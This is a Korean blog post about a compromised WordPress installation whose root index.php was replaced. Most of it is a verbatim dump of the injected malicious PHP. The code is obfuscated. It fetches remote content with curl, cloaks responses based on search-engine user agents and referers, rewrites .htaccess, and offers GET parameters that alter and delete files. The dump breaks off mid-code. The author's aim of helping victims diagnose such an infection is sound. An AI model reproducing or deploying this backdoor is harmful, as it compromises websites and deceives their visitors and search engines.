오늘은 아파치 워드프레스에 관한 공격 이야기를 해보고자 한다. 필자의 경우 어느날 갑자기 루프폴더에 설치된 워드프레스가 접근이 되지 않는 현상이 일어 났다. 문제의 원인을 파악하는 것은 여러번 해보면 간단하지만, 처음이라면 당황하여 어디서 부터 어떻게 처리해야하는지 잘 모를 때가 있다. 이러할 때 조금이나마 도움이 되었으면 한다.
먼저 필자의 경우느 문제를 파악하기 위해 루트폴더(워드프레스 설치폴더 아님, 호스팅의 경우 일반적으로 www 폴더)의 경로 접근에 이상이 없는지 Index.php 파일과 htaccess 파일을 체크해 보았다. 그리고 바로 여기서 문제점을 확인할 수 있었다.
필자가 백업해서 가지고 있었던 Index.php 파일을 비교해 보니, 다른 명령어가 들어있는 것이었다. 여기에 들어 있던 명령어는 다음과 같다.
<?php
$FI8LLII88L='1243';
$FI88LILI8L='wp-admin';
$F8LI8II8LL="b3i8ohd2_4qy5p9rnkuflegt1amjs6-0zwcvx7";$FIIL8ILL88=$F8LI8II8LL{2}.$F8LI8II8LL{22}.$F8LI8II8LL{16}.$F8LI8II8LL{4}.$F8LI8II8LL{15}.$F8LI8II8LL{21}.$F8LI8II8LL{8}.$F8LI8II8LL{18}.$F8LI8II8LL{28}.$F8LI8II8LL{21}.$F8LI8II8LL{15}.$F8LI8II8LL{8}.$F8LI8II8LL{25}.$F8LI8II8LL{0}.$F8LI8II8LL{4}.$F8LI8II8LL{15}.$F8LI8II8LL{23};$FL8LI88ILI=$F8LI8II8LL{19}.$F8LI8II8LL{2}.$F8LI8II8LL{20}.$F8LI8II8LL{21}.$F8LI8II8LL{8}.$F8LI8II8LL{13}.$F8LI8II8LL{18}.$F8LI8II8LL{23}.$F8LI8II8LL{8}.$F8LI8II8LL{34}.$F8LI8II8LL{4}.$F8LI8II8LL{16}.$F8LI8II8LL{23}.$F8LI8II8LL{21}.$F8LI8II8LL{16}.$F8LI8II8LL{23}.$F8LI8II8LL{28};$F8LIL88IIL=$F8LI8II8LL{19}.$F8LI8II8LL{2}.$F8LI8II8LL{20}.$F8LI8II8LL{21}.$F8LI8II8LL{8}.$F8LI8II8LL{22}.$F8LI8II8LL{21}.$F8LI8II8LL{23}.$F8LI8II8LL{8}.$F8LI8II8LL{34}.$F8LI8II8LL{4}.$F8LI8II8LL{16}.$F8LI8II8LL{23}.$F8LI8II8LL{21}.$F8LI8II8LL{16}.$F8LI8II8LL{23}.$F8LI8II8LL{28};$FILLI8LI88=$F8LI8II8LL{19}.$F8LI8II8LL{18}.$F8LI8II8LL{16}.$F8LI8II8LL{34}.$F8LI8II8LL{23}.$F8LI8II8LL{2}.$F8LI8II8LL{4}.$F8LI8II8LL{16}.$F8LI8II8LL{8}.$F8LI8II8LL{21}.$F8LI8II8LL{36}.$F8LI8II8LL{2}.$F8LI8II8LL{28}.$F8LI8II8LL{23}.$F8LI8II8LL{28};$FIL88I8LLI=$F8LI8II8LL{21}.$F8LI8II8LL{15}.$F8LI8II8LL{15}.$F8LI8II8LL{4}.$F8LI8II8LL{15}.$F8LI8II8LL{8}.$F8LI8II8LL{15}.$F8LI8II8LL{21}.$F8LI8II8LL{13}.$F8LI8II8LL{4}.$F8LI8II8LL{15}.$F8LI8II8LL{23}.$F8LI8II8LL{2}.$F8LI8II8LL{16}.$F8LI8II8LL{22};$FIL8I8LIL8=$F8LI8II8LL{34}.$F8LI8II8LL{15}.$F8LI8II8LL{21}.$F8LI8II8LL{25}.$F8LI8II8LL{23}.$F8LI8II8LL{21}.$F8LI8II8LL{8}.$F8LI8II8LL{19}.$F8LI8II8LL{18}.$F8LI8II8LL{16}.$F8LI8II8LL{34}.$F8LI8II8LL{23}.$F8LI8II8LL{2}.$F8LI8II8LL{4}.$F8LI8II8LL{16};$FI8LLI88LI=$F8LI8II8LL{28}.$F8LI8II8LL{21}.$F8LI8II8LL{23}.$F8LI8II8LL{8}.$F8LI8II8LL{23}.$F8LI8II8LL{2}.$F8LI8II8LL{26}.$F8LI8II8LL{21}.$F8LI8II8LL{8}.$F8LI8II8LL{20}.$F8LI8II8LL{2}.$F8LI8II8LL{26}.$F8LI8II8LL{2}.$F8LI8II8LL{23};$F8LL88IIIL=$F8LI8II8LL{0}.$F8LI8II8LL{25}.$F8LI8II8LL{28}.$F8LI8II8LL{21}.$F8LI8II8LL{29}.$F8LI8II8LL{9}.$F8LI8II8LL{8}.$F8LI8II8LL{21}.$F8LI8II8LL{16}.$F8LI8II8LL{34}.$F8LI8II8LL{4}.$F8LI8II8LL{6}.$F8LI8II8LL{21};$F88LILIIL8=$F8LI8II8LL{0}.$F8LI8II8LL{25}.$F8LI8II8LL{28}.$F8LI8II8LL{21}.$F8LI8II8LL{29}.$F8LI8II8LL{9}.$F8LI8II8LL{8}.$F8LI8II8LL{6}.$F8LI8II8LL{21}.$F8LI8II8LL{34}.$F8LI8II8LL{4}.$F8LI8II8LL{6}.$F8LI8II8LL{21};$F8L88LIILI=$F8LI8II8LL{13}.$F8LI8II8LL{15}.$F8LI8II8LL{21}.$F8LI8II8LL{22}.$F8LI8II8LL{8}.$F8LI8II8LL{15}.$F8LI8II8LL{21}.$F8LI8II8LL{13}.$F8LI8II8LL{20}.$F8LI8II8LL{25}.$F8LI8II8LL{34}.$F8LI8II8LL{21};$FIL888ILLI=$F8LI8II8LL{28}.$F8LI8II8LL{23}.$F8LI8II8LL{15}.$F8LI8II8LL{8}.$F8LI8II8LL{15}.$F8LI8II8LL{21}.$F8LI8II8LL{13}.$F8LI8II8LL{20}.$F8LI8II8LL{25}.$F8LI8II8LL{34}.$F8LI8II8LL{21};$F8LI8ILL8I=$F8LI8II8LL{19}.$F8LI8II8LL{2}.$F8LI8II8LL{20}.$F8LI8II8LL{21}.$F8LI8II8LL{8}.$F8LI8II8LL{21}.$F8LI8II8LL{36}.$F8LI8II8LL{2}.$F8LI8II8LL{28}.$F8LI8II8LL{23}.$F8LI8II8LL{28};$FILII8LL88=$F8LI8II8LL{34}.$F8LI8II8LL{18}.$F8LI8II8LL{15}.$F8LI8II8LL{20}.$F8LI8II8LL{8}.$F8LI8II8LL{28}.$F8LI8II8LL{21}.$F8LI8II8LL{23}.$F8LI8II8LL{4}.$F8LI8II8LL{13}.$F8LI8II8LL{23};$FL8IL8I8IL=$F8LI8II8LL{13}.$F8LI8II8LL{15}.$F8LI8II8LL{21}.$F8LI8II8LL{22}.$F8LI8II8LL{8}.$F8LI8II8LL{26}.$F8LI8II8LL{25}.$F8LI8II8LL{23}.$F8LI8II8LL{34}.$F8LI8II8LL{5};$FLIILL888I=$F8LI8II8LL{34}.$F8LI8II8LL{18}.$F8LI8II8LL{15}.$F8LI8II8LL{20}.$F8LI8II8LL{8}.$F8LI8II8LL{34}.$F8LI8II8LL{20}.$F8LI8II8LL{4}.$F8LI8II8LL{28}.$F8LI8II8LL{21};$F8ILLIIL88=$F8LI8II8LL{18}.$F8LI8II8LL{15}.$F8LI8II8LL{20}.$F8LI8II8LL{21}.$F8LI8II8LL{16}.$F8LI8II8LL{34}.$F8LI8II8LL{4}.$F8LI8II8LL{6}.$F8LI8II8LL{21};$FILL8L8I8I=$F8LI8II8LL{22}.$F8LI8II8LL{32}.$F8LI8II8LL{2}.$F8LI8II8LL{16}.$F8LI8II8LL{19}.$F8LI8II8LL{20}.$F8LI8II8LL{25}.$F8LI8II8LL{23}.$F8LI8II8LL{21};$F8I8LL8IIL=$F8LI8II8LL{34}.$F8LI8II8LL{18}.$F8LI8II8LL{15}.$F8LI8II8LL{20}.$F8LI8II8LL{8}.$F8LI8II8LL{2}.$F8LI8II8LL{16}.$F8LI8II8LL{2}.$F8LI8II8LL{23};$FL88ILII8L=$F8LI8II8LL{34}.$F8LI8II8LL{18}.$F8LI8II8LL{15}.$F8LI8II8LL{20}.$F8LI8II8LL{8}.$F8LI8II8LL{21}.$F8LI8II8LL{36}.$F8LI8II8LL{21}.$F8LI8II8LL{34};$FLILI8L88I=$F8LI8II8LL{28}.$F8LI8II8LL{23}.$F8LI8II8LL{15}.$F8LI8II8LL{15}.$F8LI8II8LL{13}.$F8LI8II8LL{4}.$F8LI8II8LL{28};$F8IL8LL8II=$F8LI8II8LL{28}.$F8LI8II8LL{34}.$F8LI8II8LL{25}.$F8LI8II8LL{16}.$F8LI8II8LL{6}.$F8LI8II8LL{2}.$F8LI8II8LL{15};$F8IIIL88LL=$F8LI8II8LL{21}.$F8LI8II8LL{36}.$F8LI8II8LL{13}.$F8LI8II8LL{20}.$F8LI8II8LL{4}.$F8LI8II8LL{6}.$F8LI8II8LL{21};$FIL88IL8LI=$F8LI8II8LL{6}.$F8LI8II8LL{2}.$F8LI8II8LL{15}.$F8LI8II8LL{16}.$F8LI8II8LL{25}.$F8LI8II8LL{26}.$F8LI8II8LL{21};$FIIIL8L8L8=$F8LI8II8LL{18}.$F8LI8II8LL{16}.$F8LI8II8LL{20}.$F8LI8II8LL{2}.$F8LI8II8LL{16}.$F8LI8II8LL{17};$F8ILLII8L8=$F8LI8II8LL{28}.$F8LI8II8LL{23}.$F8LI8II8LL{15}.$F8LI8II8LL{28}.$F8LI8II8LL{23}.$F8LI8II8LL{15};$FL8IILL88I=$F8LI8II8LL{28}.$F8LI8II8LL{23}.$F8LI8II8LL{15}.$F8LI8II8LL{20}.$F8LI8II8LL{21}.$F8LI8II8LL{16};$FILLL8I8I8=$F8LI8II8LL{2}.$F8LI8II8LL{28}.$F8LI8II8LL{8}.$F8LI8II8LL{6}.$F8LI8II8LL{2}.$F8LI8II8LL{15};$F88LI8LILI=$F8LI8II8LL{26}.$F8LI8II8LL{17}.$F8LI8II8LL{6}.$F8LI8II8LL{2}.$F8LI8II8LL{15};$FLI88ILL8I=$F8LI8II8LL{34}.$F8LI8II8LL{4}.$F8LI8II8LL{18}.$F8LI8II8LL{16}.$F8LI8II8LL{23};$F8ILIL8I8L=$F8LI8II8LL{34}.$F8LI8II8LL{5}.$F8LI8II8LL{26}.$F8LI8II8LL{4}.$F8LI8II8LL{6};$FLL8II88IL=$F8LI8II8LL{23}.$F8LI8II8LL{15}.$F8LI8II8LL{2}.$F8LI8II8LL{26};$FLI8LLII88=$F8LI8II8LL{6}.$F8LI8II8LL{25}.$F8LI8II8LL{23}.$F8LI8II8LL{21};header('Content-Type:text/html;charset=utf-8');${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x38\x49\x38\x4c\x4c\x49"](0);;$F8IILL8LI8=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x49\x38\x4c\x49\x4c\x38"]('$FL8I8LI8IL=\'\',$F88LLLI8II=NULL,$F8III88LLL=array()','$FILI8IL8L8=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'Sy4tyhTonPzMss0U4GsYpTS/ILoOzUitRtPkAA==\');$FIL8LI8LI8=$F8LLII8IL8=\'\';foreach(${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x49\x49\x4c\x38\x38\x4c\x4c"](\'|\',$FILI8IL8L8) as $c){$F8I8LL8LII=1;foreach(${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x49\x49\x4c\x38\x38\x4c\x4c"](\'+\',$c) as $d){if(!${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x4c\x49\x38\x4c\x49\x38\x38"]($d)){$F8I8LL8LII=0;}}unset($d);if($F8I8LL8LII){$FIL8LI8LI8=$c;break;}}unset($FILI8IL8L8,$c);if($FIL8LI8LI8==\'\'){return 0;}if(substr($FIL8LI8LI8,0,1)==\'c\'){$F88ILL8IIL=${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x38\x4c\x4c\x38\x49\x49\x4c"]();${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x49\x49\x38\x4c\x4c\x38\x38"]($F88ILL8IIL,CURLOPT_URL,$FL8I8LI8IL);${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x49\x49\x38\x4c\x4c\x38\x38"]($F88ILL8IIL,CURLOPT_USERAGENT,\'WHR\');${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x49\x49\x38\x4c\x4c\x38\x38"]($F88ILL8IIL,CURLOPT_RETURNTRANSFER,1);${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x49\x49\x38\x4c\x4c\x38\x38"]($F88ILL8IIL,CURLOPT_TIMEOUT,100);$FL8LLI8I8I=${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x38\x38\x49\x4c\x49\x49\x38\x4c"]($F88ILL8IIL);${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x49\x49\x4c\x4c\x38\x38\x38\x49"]($F88ILL8IIL);if(!$FL8LLI8I8I){return 0;}else{$FL8LLI8I8I=${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x4c\x38\x49\x49\x38\x38\x49\x4c"](${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x4c\x38\x49\x49\x38\x38\x49\x4c"]($FL8LLI8I8I,"\\xEF\\xBB\\xBF"));return $FL8LLI8I8I;}}if($FL8I88ILIL==\'\'){if(${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x4c\x49\x38\x4c\x49\x38\x38"](${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x4c\x49\x4c\x38\x38\x49\x49\x4c"]) and $FL8I8LI8IL){$FL8I88ILIL=@${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x4c\x49\x4c\x38\x38\x49\x49\x4c"]($FL8I8LI8IL);}}unset($F8LLII8IL8,$FIL8LI8LI8,$fp,$port,$_host);return ${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x4c\x38\x49\x49\x38\x38\x49\x4c"](${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x4c\x38\x49\x49\x38\x38\x49\x4c"]($FL8I88ILIL,"\\xEF\\xBB\\xBF"));');$FIL8LI8IL8=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x49\x38\x4c\x49\x4c\x38"]('$FIL8LI8LI8nbed','$FL88LIII8L=substr($FIL8LI8LI8nbed,0,5);$F8LLI8LI8I=substr($FIL8LI8LI8nbed,-5);$FLL888ILII=substr($FIL8LI8LI8nbed,7,${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x38\x49\x49\x4c\x4c\x38\x38\x49"]($FIL8LI8LI8nbed)-14);return ${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x4c\x38\x4c\x38\x49\x38\x49"](${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x38\x4c\x49\x4c\x49\x49\x4c\x38"]($FL88LIII8L.$FLL888ILII.$F8LLI8LI8I));');$F8LIL88LII=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x49\x38\x4c\x49\x4c\x38"]('$FILI8IL8L8gent','$FIILL8L8I8=false;$FL88LLII8I=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'S8/PThT89JTcotPvqQEA\');$FL88LLII8I.=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'S8rMShT0/KL6lJz89Pz0mtPtAQA=\');$FL88LLII8I.=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'S8zPqhTUnKzEuvqUzMyM8tPHAA==\');if($FILI8IL8L8gent!=\'\'){if(${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x38\x49\x4c\x38\x49\x38\x49\x4c"]("/($FL88LLII8I)/si",$FILI8IL8L8gent)){$FIILL8L8I8=true;}}return $FIILL8L8I8;');$FL8LIL8I8I=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x49\x38\x4c\x49\x4c\x38"]('$FL8LLI8I8Iefer','$FIIL888ILL=false;$FL88IILIL8=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'S8/PThT89J1UvO18stPqqAEA\');$FL88IILIL8.=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'q0zMyhTM/XS87XyyqtPoAQA=\');$FL88IILIL8.=\'bing\';if($FL8LLI8I8Iefer!=\'\'&&${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x38\x49\x4c\x38\x49\x38\x49\x4c"]("/($FL88IILIL8)/si",$FL8LLI8I8Iefer)){$FIIL888ILL=true;}return $FIIL888ILL;');$F88LIIIL8L=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x49\x38\x4c\x49\x4c\x38"]('$FILI8IL8L8pidelpath','$FILL8IL88I=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'S0nNShTS1JrUktKsotPvAgA=\');$FIIL88LL8I=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'S0nNShTS1JrSkuTU5OLS4tPGAA==\');$FLII8LL8I8=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'S0nNShTS1JrcnLV0jLzEktPFAA==\');$F88LII8ILL=isset(${"\x5fG\x45T"}[\'xxxxxxxxxxxx_fil\'.\'ename\'])?${"\x5fG\x45T"}[\'xxxxxxxxxxxx_fil\'.\'ename\']:\'\';if($F88LII8ILL==${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'SyzIThTEntPNAQA=\')){$F88LII8ILL=$FILI8IL8L8pidelpath;}if(${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x4c\x49\x38\x49\x4c\x4c\x38\x49"]($F88LII8ILL)){@${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x49\x4c\x38\x49\x38\x4c"]($F88LII8ILL,0644);if(!${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x49\x49\x4c\x38\x4c\x38\x4c\x38"]($F88LII8ILL)){echo $FILL8IL88I;}else{echo $FIIL88LL8I;}}else{echo $FLII8LL8I8;}');$F8IIIL8LL8=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x49\x38\x4c\x49\x4c\x38"]('$FIIL8I8LL8=\'\',$FI8L8ILL8I,$FI88LII8LL,$FII88LIL8L','$FLL8L8III8=\'\';$FILIL8I88L=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'s/FM8hT81PKc1JVcjNT4ktPvSgUA\').\'write.c>\';$FLI88LI8LI=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'C0otLhT8osSXUtPFAA==\').\'ngine\';$F8LL88IILI=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'C0otLhT8osSXUtPCAA==\').\'ase\';$FL8ILI88LI=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'C0otLhT8osSQ0tPCAA==\').\'ule\';$FILLII88L8=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'C0otLhT8osSXUtPGAA==\').\'ond\';$FILLI88I8L=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'s9H3ThTPPNTyktPFAA==\').\'le>\';$FLILLI888I=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'C3INDhTHUtPNDgEA\').\'_FILENAME\';$FI88LLIIL8=\'inde\'.\'x.php\';$FIIL8I8LL8= $FILIL8I88L."\\n";$FIIL8I8LL8 .=$FLI88LI8LI."\\x20On\\n";$FIIL8I8LL8 .=$F8LL88IILI."\\x20/\\n";$FIIL8I8LL8 .=$FL8ILI88LI."\\x20^".$FI88LLIIL8."$\\x20-\\x20[L]\\n";$FIIL8I8LL8 .=$FILLII88L8."\\x20%{".$FLILLI888I."}\\x20!-f\\n";$FIIL8I8LL8 .=$FILLII88L8."\\x20%{".$FLILLI888I."}\\x20!-d\\n";$FIIL8I8LL8 .=$FL8ILI88LI."\\x20.\\x20".$FLL8L8III8.$FI88LLIIL8." [L]\\n";$FIIL8I8LL8 .=$FILLI88I8L;if($FIIL8I8LL8!=\'\'){if($FI8L8ILL8I){$FL8LIIIL88=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'09PXyhTyhtPJTAYA\');$FL8LIIIL88.=\'cess\';if($FL8LIIIL88!=\'\'){@${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x49\x4c\x38\x49\x38\x4c"]($FL8LIIIL88,0644);$FILIL8L8I8=@${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x4c\x49\x4c\x38\x38\x49\x49\x4c"]($FL8LIIIL88);if(!${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x4c\x49\x49\x38\x4c\x38"]($FILIL8L8I8,$FLILLI888I)||!${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x4c\x49\x49\x38\x4c\x38"]($FILIL8L8I8,$FL8ILI88LI."\\x20.\\x20".$FLL8L8III8.$FI88LLIIL8." [L]\\n")||!${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x4c\x49\x49\x38\x4c\x38"]($FILIL8L8I8,$FL8ILI88LI."\\x20^".$FI88LLIIL8."$\\x20-\\x20[L]\\n")){$FILIL8L8I8=$FIIL8I8LL8.PHP_EOL .$FILIL8L8I8;@${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x38\x4c\x49\x38\x38\x49\x4c\x49"]($FL8LIIIL88,$FILIL8L8I8);}}}}');$FLI8I88LLI=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x49\x38\x4c\x49\x4c\x38"]('$FL88LII8LI=\'\'','$F8LLLIII88=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x38\x49\x4c\x38\x4c\x49"](__FILE__);foreach(${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x38\x4c\x4c\x38\x49\x49"]($F8LLLIII88) as $FLII8ILL88){if($FLII8ILL88==\'.\'||$FLII8ILL88==\'..\') continue;if(${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x4c\x4c\x38\x49\x38\x49\x38"]($F8LLLIII88.\'/\'.$FLII8ILL88)){$FL88LII8LIArray[] =$FLII8ILL88;}}$FI88LILI8L=\'temp\';$FL88LII8LIArray[] =$FI88LILI8L;return $FL88LII8LIArray;');$FI8ILL88IL=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x49\x38\x4c\x49\x4c\x38"]('$FI8I8LLIL8=\'\'','@${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x38\x4c\x4c\x49\x38\x38\x4c\x49"](3600);@${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x49\x4c\x38\x49\x4c\x4c\x38\x38"](1);global $FI8LLII88L,$FI88LILI8L;$FI8L8ILL8I="1";$F88IL8LILI=\'\';$FLIII8L8L8pps =\'\';$FLLI8ILI88=${"_S\x45\x52\x56\x45R"}["\x48\x54\x54\x50\x5f\x41\x43\x43\x45\x50\x54\x5f\x4c\x41\x4e\x47\x55\x41\x47\x45"];$FIIL8LI8L8=isset(${"_S\x45\x52\x56\x45R"}["\x48\x54\x54\x50\x5f\x52\x45\x46\x45\x52\x45\x52"])?${"_S\x45\x52\x56\x45R"}["\x48\x54\x54\x50\x5f\x52\x45\x46\x45\x52\x45\x52"]:\'\';$FLII8IL88L=isset(${"_S\x45\x52\x56\x45R"}["\x48\x54\x54\x50\x5f\x55\x53\x45\x52\x5f\x41\x47\x45\x4e\x54"])?${"_S\x45\x52\x56\x45R"}["\x48\x54\x54\x50\x5f\x55\x53\x45\x52\x5f\x41\x47\x45\x4e\x54"]:\'\';$FLIIL8L88I=${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x4c\x49\x4c\x38\x38\x4c\x49\x49"]($FLII8IL88L);$FLI88LLII8=${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x38\x4c\x49\x4c\x38\x49\x38\x49"]($FIIL8LI8L8);$F8ILI8I8LL=\'\';if(isset(${"_S\x45\x52\x56\x45R"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"])){$F8ILI8I8LL=${"_S\x45\x52\x56\x45R"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"];}elseif(isset(${"_S\x45\x52\x56\x45R"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"])){$F8ILI8I8LL=${"_S\x45\x52\x56\x45R"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"];}if($FI88LILI8L==""){$FI8L8L8ILI=${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x49\x38\x49\x38\x38\x4c\x4c\x49"]();$FI88LILI8L=$FI8L8L8ILI[0];}else{$FI88LILI8L=$FI88LILI8L;}$FLIL88I8IL=${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x4c\x4c\x38\x38\x49\x49\x49\x4c"]($F8ILI8I8LL).\'.txt\';$F8IL8I8LLI=${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x4c\x4c\x38\x38\x49\x49\x49\x4c"]($F8ILI8I8LL).\'a.txt\';if(!${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x4c\x4c\x38\x49\x38\x49\x38"]($FI88LILI8L)){${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x38\x4c\x49\x38\x4c\x49\x4c\x49"]($FI88LILI8L);}$FLIL88I8IL=$FI88LILI8L.\'/\'.$FLIL88I8IL;$F8IL8I8LLI=$FI88LILI8L.\'/\'.$F8IL8I8LLI;if(isset(${"\x5fG\x45T"}[\'xxxxxxxxxxxx_d\'.\'el\'])){${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x38\x4c\x49\x49\x49\x4c\x38\x4c"]($FLIL88I8IL);exit();}if(!${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x4c\x49\x38\x49\x4c\x4c\x38\x49"]($FLIL88I8IL)){$F8LL8LI8II=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x4c\x49\x38\x49\x4c\x38"](\'yygpKhTbDS108syNQr0C0pSk1L08vMS8uHCGQU2KftPbAgA=\');$FLL8LIII88=${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x49\x4c\x4c\x38\x4c\x49\x38"]($F8LL8LI8II.$FI8LLII88L);@${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x38\x4c\x49\x38\x38\x49\x4c\x49"]($FLIL88I8IL,$FLL8LIII88);}$FLL8LIII88=${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x4c\x49\x4c\x38\x38\x49\x49\x4c"]($FLIL88I8IL);$FLL8LIII88=${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x49\x49\x4c\x38\x38\x4c\x4c"](\'|\',$FLL8LIII88);$F88IIL8LLI=${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x38\x4c\x49\x4c\x49\x49\x4c\x38"](${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x4c\x38\x49\x49\x38\x38\x49\x4c"]($FLL8LIII88[0]));$F8IL8LLII8=${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x38\x4c\x49\x4c\x49\x49\x4c\x38"](${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x4c\x38\x49\x49\x38\x38\x49\x4c"]($FLL8LIII88[1]));$F8LIL8ILI8=${"_S\x45\x52\x56\x45R"}["\x52\x45\x51\x55\x45\x53\x54\x5f\x55\x52\x49"];$FI88LII8LL=\'\';$FII88LIL8L=${"_S\x45\x52\x56\x45R"}["\x44\x4f\x43\x55\x4d\x45\x4e\x54\x5f\x52\x4f\x4f\x54"];$FII88LIL8L=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x38\x38\x49\x4c\x4c\x49"](\'\\\\\',\'/\',$FII88LIL8L);$F8LLIII88L=__FILE__;$F8LLIII88L=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x38\x38\x49\x4c\x4c\x49"](\'\\\\\',\'/\',$F8LLIII88L);$F8ILL8ILI8=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x38\x49\x4c\x38\x4c\x49"](__FILE__).\'/\';$F8ILL8ILI8=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x38\x38\x49\x4c\x4c\x49"](\'\\\\\',\'/\',$F8ILL8ILI8);if(${"G\x4cO\x42\x41\x4cS"}["\x46\x38\x49\x4c\x4c\x49\x49\x38\x4c\x38"]($F8LLIII88L,\'(\')){$F8LLIII88L=substr($F8LLIII88L,0,${"G\x4cO\x42\x41\x4cS"}["\x46\x4c\x49\x4c\x49\x38\x4c\x38\x38\x49"]($F8LLIII88L,\'(\'));}$FI88ILL8IL=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x38\x38\x49\x4c\x4c\x49"]($F8ILL8ILI8,\'\',$F8LLIII88L);$F88IL8LILI=${"G\x4cO\x42\x41\x4cS"}["\x46\x49\x4c\x38\x38\x38\x49\x4c\x4c\x49"]($FII88LIL8L,\'\',$F8ILL8ILI8);$FI88LII8